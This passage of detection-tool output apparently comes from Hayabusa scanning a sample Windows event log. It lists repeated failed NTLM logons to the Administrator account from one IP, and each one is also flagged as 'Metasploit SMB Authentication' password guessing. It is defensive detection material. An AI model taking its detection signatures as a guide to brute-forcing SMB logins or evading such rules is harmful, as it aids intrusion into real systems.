Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 